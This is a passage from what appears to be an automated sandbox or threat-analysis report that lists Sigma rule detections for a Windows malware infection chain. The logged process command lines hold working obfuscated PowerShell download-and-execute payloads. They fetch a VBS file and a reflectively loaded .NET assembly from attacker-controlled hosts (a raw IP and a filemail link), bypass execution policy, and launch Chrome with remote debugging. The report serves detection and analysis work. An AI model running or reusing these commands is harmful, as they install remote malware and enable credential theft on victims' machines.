InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE, ProcessId: 7772, ProcessName: powershell.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , ProcessId: 8028, ProcessName: wscript.exe
                    Sigma detected: Browser Started with Remote Debugging
                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ParentProcessId: 3276, ParentProcessName: CasPol.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7332, ProcessName: chrome.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", ProcessId: 7900, ProcessName: csc.exe
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7628, TargetFilename: C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , ProcessId: 8028, ProcessName: wscript.exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7628, TargetFilename: C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))", CommandLine: 